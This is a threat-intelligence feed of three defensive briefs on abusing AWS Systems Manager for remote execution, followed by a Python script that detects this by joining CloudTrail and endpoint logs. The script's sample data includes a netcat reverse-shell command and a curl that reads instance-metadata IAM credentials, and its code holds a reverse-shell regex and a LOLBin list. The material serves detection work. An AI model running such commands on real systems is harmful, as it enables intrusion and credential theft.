{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/ssm/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AWS Systems Manager Session Manager"],"_cs_severities":["medium"],"_cs_tags":["aws","ssm","session-manager","execution","cloud"],"_cs_type":"advisory","_cs_vendors":["Amazon"],"content_html":"\u003cp\u003eAWS Systems Manager (SSM) Session Manager provides interactive shell access to EC2 instances and hybrid nodes without the need for bastion hosts or open inbound ports. Attackers can abuse this functionality by leveraging compromised AWS credentials or IAM roles with \u003ccode\u003essm:StartSession\u003c/code\u003e permissions to gain unauthorized access to target systems. This allows for remote execution of commands and lateral movement within the AWS environment. The technique involves spawning child processes from the SSM session worker process to perform malicious activities. 
Defenders should monitor for unusual process execution patterns originating from SSM sessions to identify potential abuse.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker obtains valid AWS credentials or an IAM role with \u003ccode\u003essm:StartSession\u003c/code\u003e permission on the target.\u003c/li\u003e\n\u003cli\u003eAttacker initiates an SSM session to a target EC2 instance or hybrid node using the compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003essm-session-worker\u003c/code\u003e process is started on the target instance to manage the interactive session.\u003c/li\u003e\n\u003cli\u003eAttacker executes commands within the session; the worker launches the session shell, so everything the attacker runs appears as a child or descendant of \u003ccode\u003essm-session-worker\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAttacker runs Bash or PowerShell inside the session to execute malicious code. (The names \u003ccode\u003eawsrunShellScript\u003c/code\u003e and \u003ccode\u003eawsrunPowerShellScript\u003c/code\u003e are the on-instance working directories of the Run Command plugins \u003ccode\u003eaws:runShellScript\u003c/code\u003e and \u003ccode\u003eaws:runPowerShellScript\u003c/code\u003e used by \u003ccode\u003eSendCommand\u003c/code\u003e documents; they are a Run Command artifact, not something invoked from a Session Manager shell.)\u003c/li\u003e\n\u003cli\u003eThe code run there performs reconnaissance, downloads additional tools, or attempts credential access.\u003c/li\u003e\n\u003cli\u003eAttacker moves laterally to other instances or resources within the AWS environment.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often data exfiltration, privilege escalation, or persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive data, compromise of critical systems, and lateral movement within the AWS environment. The impact ranges from data breaches to complete control of the compromised infrastructure. The number of affected systems depends on the scope of the compromised credentials and the attacker\u0026rsquo;s ability to move laterally. 
Any organization that permits Session Manager access is exposed to this technique.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious child processes spawned by \u003ccode\u003essm-session-worker\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eCorrelate process activity with AWS CloudTrail \u003ccode\u003eStartSession\u003c/code\u003e, \u003ccode\u003eResumeSession\u003c/code\u003e and \u003ccode\u003eTerminateSession\u003c/code\u003e events (event source \u003ccode\u003essm.amazonaws.com\u003c/code\u003e) to identify the IAM principal behind a session; the instance ID in \u003ccode\u003erequestParameters.target\u003c/code\u003e and the event time tie a session to the host where the child processes appeared.\u003c/li\u003e\n\u003cli\u003eImplement strict IAM policies and regularly review AWS credentials to minimize the risk of credential compromise.\u003c/li\u003e\n\u003cli\u003eMonitor \u003ccode\u003eprocess.command_line\u003c/code\u003e, \u003ccode\u003eprocess.executable\u003c/code\u003e and \u003ccode\u003eprocess.user.name\u003c/code\u003e for unusual activity within SSM sessions; Session Manager shells run as \u003ccode\u003essm-user\u003c/code\u003e unless Run As support is enabled, so any other user beneath \u003ccode\u003essm-session-worker\u003c/code\u003e deserves attention.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T20:57:28Z","date_published":"2026-05-01T20:57:28Z","id":"/briefs/2024-01-aws-ssm-session-manager-abuse/","summary":"Adversaries abuse AWS Systems Manager (SSM) Session Manager to gain remote execution and lateral movement within AWS environments by spawning malicious child processes from the SSM session worker, leveraging legitimate AWS credentials and IAM permissions.","title":"AWS SSM Session Manager Child Process Execution Abuse","url":"https://feed.craftedsignal.io/briefs/2024-01-aws-ssm-session-manager-abuse/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["cloud","aws","ssm","execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis rule flags the creation of an AWS Systems Manager (SSM) Command document by a user or role that does not typically perform this action. 
Adversaries may create SSM command documents to execute commands on managed instances, potentially leading to unauthorized access, command and control, and data exfiltration. The rule uses AWS CloudTrail logs to monitor the \u003ccode\u003eCreateDocument\u003c/code\u003e API call within the SSM service. The activity is flagged when the user or role creating the document deviates from established patterns. This detection is relevant for organizations that manage their infrastructure with AWS SSM and aims to surface a new command document before it is used for unauthorized execution on managed instances.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to an AWS account, potentially through compromised credentials or an exposed IAM role.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new SSM Command document using the \u003ccode\u003eCreateDocument\u003c/code\u003e API call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eCreateDocument\u003c/code\u003e API call is logged by AWS CloudTrail with details about the user identity, request parameters, and document description.\u003c/li\u003e\n\u003cli\u003eThe detection rule analyzes CloudTrail logs, specifically looking for the \u003ccode\u003eCreateDocument\u003c/code\u003e event whose \u003ccode\u003erequestParameters.documentType\u003c/code\u003e is \u003ccode\u003eCommand\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe rule identifies the user or role associated with the \u003ccode\u003eCreateDocument\u003c/code\u003e API call by inspecting the \u003ccode\u003eaws.cloudtrail.user_identity.arn\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eIf that user or role rarely creates SSM Command documents within the organization, the rule triggers an alert.\u003c/li\u003e\n\u003cli\u003eThe attacker could then use the created document to execute arbitrary commands on managed 
instances.\u003c/li\u003e\n\u003cli\u003eExecution of those commands can yield unauthorized access, command and control, data exfiltration, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA malicious SSM command document can be run against every instance the attacker is permitted to target, so the blast radius is the set of systems managed by SSM in the account: hundreds or thousands of hosts in a large environment. Outcomes include data exfiltration, system compromise, and denial of service.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;AWS SSM Command Document Created by Rare User\u0026rdquo; to your SIEM, making sure CloudTrail is indexed where the rule expects it (the published rule uses the index patterns \u0026ldquo;filebeat-*\u0026rdquo; and \u0026ldquo;logs-aws.cloudtrail-*\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eReview the \u003ccode\u003eaws.cloudtrail.request_parameters.content\u003c/code\u003e field in the CloudTrail logs for any suspicious commands within the created SSM document.\u003c/li\u003e\n\u003cli\u003eRestrict \u003ccode\u003essm:CreateDocument\u003c/code\u003e to specific, trusted roles or users so that document creation by anyone else is both prevented and, if attempted, clearly anomalous.\u003c/li\u003e\n\u003cli\u003eWatch for subsequent \u003ccode\u003eSendCommand\u003c/code\u003e calls whose \u003ccode\u003erequestParameters.documentName\u003c/code\u003e names the new document, to see whether it is actually used to execute commands on managed instances.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T16:27:52Z","date_published":"2026-04-10T16:27:52Z","id":"/briefs/2024-11-aws-ssm-rare-user/","summary":"An AWS Systems Manager (SSM) command document creation by a user or role who does not typically perform this action, which can lead 
to unauthorized access, command and control, or data exfiltration.","title":"AWS SSM Command Document Created by Rare User","url":"https://feed.craftedsignal.io/briefs/2024-11-aws-ssm-rare-user/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["aws","ec2","ssm","lolbin","execution","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis threat brief focuses on detecting the execution of Living Off the Land Binaries (LOLBins) or GTFOBins on Amazon EC2 instances via the AWS Systems Manager (SSM) \u003ccode\u003eSendCommand\u003c/code\u003e API. The detection correlates AWS CloudTrail \u003ccode\u003eSendCommand\u003c/code\u003e events with endpoint process execution by matching SSM command IDs. CloudTrail records the \u003ccode\u003edocumentName\u003c/code\u003e of a \u003ccode\u003eSendCommand\u003c/code\u003e call but redacts its \u003ccode\u003eparameters\u003c/code\u003e, so the command text never reaches CloudTrail; the endpoint side of the join supplies the actual commands executed on the instance. This matters because adversaries may abuse SSM to execute commands remotely without SSH or RDP access, leveraging legitimate system utilities for data exfiltration, reverse shells, or lateral movement within the cloud environment. The rule was last updated on 2026-04-10.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to AWS via compromised credentials or an exposed IAM role.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the AWS CLI or API to initiate an SSM \u003ccode\u003eSendCommand\u003c/code\u003e to a target EC2 instance. 
The \u003ccode\u003eDocumentName\u003c/code\u003e parameter is set to \u003ccode\u003eAWS-RunShellScript\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe SSM agent on the EC2 instance picks up the \u003ccode\u003eSendCommand\u003c/code\u003e request over its outbound connection to the SSM service; no inbound port is involved.\u003c/li\u003e\n\u003cli\u003eThe agent writes the command to \u003ccode\u003e_script.sh\u003c/code\u003e under its orchestration directory, whose path carries the command ID (on Linux, \u003ccode\u003e/var/lib/amazon/ssm/\u0026lt;instance-id\u0026gt;/document/orchestration/\u0026lt;command-id\u0026gt;/awsrunShellScript/0.awsrunShellScript/_script.sh\u003c/code\u003e), and runs it with the shell.\u003c/li\u003e\n\u003cli\u003eThe shell script executes a LOLBin, such as \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, or \u003ccode\u003eperl\u003c/code\u003e, to perform malicious actions. The LOLBin\u0026rsquo;s parent is the shell running \u003ccode\u003e_script.sh\u003c/code\u003e, so the command ID in the parent command line links the process back to the CloudTrail \u003ccode\u003eSendCommand\u003c/code\u003e event.\u003c/li\u003e\n\u003cli\u003eThe LOLBin is used to download a malicious payload, establish a reverse shell, or exfiltrate data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established reverse shell to perform further actions on the EC2 instance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to EC2 instances, data exfiltration, deployment of malware, and lateral movement within the AWS environment. No count of affected organizations is available. Because the command arrives through the agent\u0026rsquo;s outbound channel, network controls that watch for inbound SSH or RDP never see it. Organizations in any sector running EC2 instances with SSM are potentially at risk. 
The absence of any SSH or RDP connection makes this technique particularly stealthy.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable AWS CloudTrail logging and alert on \u003ccode\u003eSendCommand\u003c/code\u003e events whose \u003ccode\u003erequestParameters.documentName\u003c/code\u003e is \u003ccode\u003eAWS-RunShellScript\u003c/code\u003e (or \u003ccode\u003eAWS-RunPowerShellScript\u003c/code\u003e on Windows); the \u003ccode\u003eparameters\u003c/code\u003e field is redacted, so the document name, the target instance IDs and the \u003ccode\u003ecommandId\u003c/code\u003e in \u003ccode\u003eresponseElements\u003c/code\u003e are what CloudTrail gives you.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect AWS EC2 LOLBin Execution via SSM SendCommand\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor endpoint process execution logs for LOLBins such as \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, \u003ccode\u003eperl\u003c/code\u003e and \u003ccode\u003enc\u003c/code\u003e whose parent command line contains the SSM orchestration path and \u003ccode\u003e_script.sh\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRestrict \u003ccode\u003essm:SendCommand\u003c/code\u003e to authorized users and roles, and scope it with resource-level conditions on the document and instance ARNs it may target.\u003c/li\u003e\n\u003cli\u003eReview and audit existing SSM configurations to identify and remediate any overly permissive settings.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T16:27:52Z","date_published":"2026-04-10T16:27:52Z","id":"/briefs/2024-01-03-aws-ec2-lolbin-ssm/","summary":"Detection of Living Off the Land Binaries (LOLBins) or GTFOBins execution on EC2 instances via AWS Systems Manager (SSM) SendCommand API, potentially indicating malicious activity.","title":"AWS EC2 LOLBin Execution via SSM SendCommand","url":"https://feed.craftedsignal.io/briefs/2024-01-03-aws-ec2-lolbin-ssm/"}],"language":"en","title":"CraftedSignal Threat Feed — Ssm","version":"https://jsonfeed.org/version/1.1"}
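All three briefs in this feed come down to joins between CloudTrail SSM events and endpoint process telemetry. The Python below is an added example, not code from the CraftedSignal briefs or from AWS, that runs those joins over constructed sample records: it flags LOLBin or reverse-shell children of `ssm-session-worker` and attributes them to the `StartSession` principal on the same instance (first brief), flags Command-document creation by a principal outside a baseline set (second brief), and recovers the command line that CloudTrail redacts by matching the command ID in the parent `_script.sh` orchestration path to the `SendCommand` record (third brief). Assumptions: endpoint events carry the ECS field names the briefs cite plus `cloud.instance.id`; the orchestration path is the Linux agent's layout; the LOLBin set, the reverse-shell regex, the account, ARNs, instance ID, command ID and every log record are invented for the example.

```python
"""Join AWS CloudTrail SSM events with endpoint process telemetry.
Added example, not code from the CraftedSignal briefs or from AWS. Endpoint
events use the ECS names the briefs cite plus cloud.instance.id; CloudTrail
records use their native JSON shape. Every record below is constructed."""
import re
from datetime import datetime, timezone

# Assumption: Linux agent layout; Run Command writes each invocation's script
# under an orchestration directory named after the SSM command ID.
ORCH_RE = re.compile(r"/var/lib/amazon/ssm/[^/]+/document/orchestration/([0-9a-f-]{36})/")
LOLBINS = {"curl", "wget", "python", "python3", "perl", "nc", "ncat", "socat"}
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|bash\s+-i")
REDACTED = "HIDDEN_DUE_TO_SECURITY_REASONS"  # CloudTrail's SendCommand placeholder

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def _exe(ev):
    return ev["process.executable"].rsplit("/", 1)[-1]

def session_children(proc_events):
    """Brief 1: LOLBins or reverse-shell syntax spawned by ssm-session-worker."""
    return [ev for ev in proc_events
            if ev["process.parent.name"] == "ssm-session-worker"
            and (_exe(ev) in LOLBINS or REVERSE_SHELL.search(ev["process.command_line"]))]

def attribute_session(ev, cloudtrail):
    """ARN behind the latest StartSession on this instance before the process
    started, or None when CloudTrail shows no such session."""
    t, best = _ts(ev["@timestamp"]), None
    for rec in cloudtrail:
        if (rec["eventName"] == "StartSession"
                and rec["requestParameters"].get("target") == ev["cloud.instance.id"]
                and _ts(rec["eventTime"]) <= t
                and (best is None or _ts(rec["eventTime"]) > _ts(best["eventTime"]))):
            best = rec
    return None if best is None else best["userIdentity"]["arn"]

def rare_document_creators(cloudtrail, known_creators):
    """Brief 2: Command-document creation by an ARN outside the baseline set."""
    return [rec for rec in cloudtrail
            if rec["eventName"] == "CreateDocument"
            and rec["requestParameters"].get("documentType") == "Command"
            and rec["userIdentity"]["arn"] not in known_creators]

def correlate_run_command(proc_events, cloudtrail):
    """Brief 3: join a process to its SendCommand record through the command ID
    in the parent _script.sh path; the endpoint supplies what CloudTrail redacts."""
    by_id = {rec["responseElements"]["command"]["commandId"]: rec
             for rec in cloudtrail if rec["eventName"] == "SendCommand"}
    findings = []
    for ev in proc_events:
        m = ORCH_RE.search(ev.get("process.parent.command_line", ""))
        if not m:
            continue
        rec = by_id.get(m.group(1))  # None if no SendCommand for this ID reached CloudTrail
        findings.append({
            "command_id": m.group(1),
            "principal": rec["userIdentity"]["arn"] if rec else None,
            "document": rec["requestParameters"]["documentName"] if rec else None,
            "cloudtrail_parameters": rec["requestParameters"].get("parameters") if rec else None,
            "actual_command_line": ev["process.command_line"],
            "lolbin": _exe(ev) in LOLBINS,
        })
    return findings

# Constructed sample records (not real logs); account, ARNs, instance and
# command IDs are placeholders and 203.0.113.0/24 is a documentation range.
CMD_ID = "4f2c7b6e-1d2a-4e5f-9a8b-7c6d5e4f3a2b"
INSTANCE = "i-0abc123def456"
CLOUDTRAIL = [
    {"eventTime": "2026-04-10T16:20:00Z", "eventName": "StartSession",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/ReadOnly/alice"},
     "requestParameters": {"target": INSTANCE}},
    {"eventTime": "2026-04-10T16:25:00Z", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deploy"},
     "requestParameters": {"documentName": "AWS-RunShellScript",
                           "instanceIds": [INSTANCE], "parameters": REDACTED},
     "responseElements": {"command": {"commandId": CMD_ID}}},
    {"eventTime": "2026-04-10T16:26:00Z", "eventName": "CreateDocument",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deploy"},
     "requestParameters": {"name": "Maint-Collect", "documentType": "Command"}},
]
PROCESSES = [
    {"@timestamp": "2026-04-10T16:21:30Z", "cloud.instance.id": INSTANCE,
     "process.parent.name": "ssm-session-worker", "process.user.name": "ssm-user",
     "process.executable": "/usr/bin/curl",
     "process.command_line": "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/"},
    {"@timestamp": "2026-04-10T16:25:05Z", "cloud.instance.id": INSTANCE,
     "process.parent.name": "sh", "process.user.name": "root",
     "process.parent.command_line": f"sh /var/lib/amazon/ssm/{INSTANCE}/document/orchestration/"
                                    f"{CMD_ID}/awsrunShellScript/0.awsrunShellScript/_script.sh",
     "process.executable": "/usr/bin/nc",
     "process.command_line": "nc -e /bin/sh 203.0.113.7 4444"},
]

if __name__ == "__main__":
    for ev in session_children(PROCESSES):
        print("session child:", ev["process.command_line"], "by", attribute_session(ev, CLOUDTRAIL))
    for rec in rare_document_creators(CLOUDTRAIL, {"arn:aws:iam::111122223333:role/PlatformAutomation"}):
        print("rare creator:", rec["userIdentity"]["arn"], "->", rec["requestParameters"]["name"])
    for f in correlate_run_command(PROCESSES, CLOUDTRAIL):
        print("run command:", f)
```

In real telemetry a Session Manager shell (`sh`, `bash`, `powershell`) usually sits between `ssm-session-worker` and the command the attacker types, so `session_children` should be extended to walk the ancestry if your EDR exposes it; the direct-parent check above mirrors how the brief phrases the detection. The `cloudtrail_parameters` field is kept in each Run Command finding deliberately: it shows the analyst the redaction placeholder beside the real command line recovered from the host.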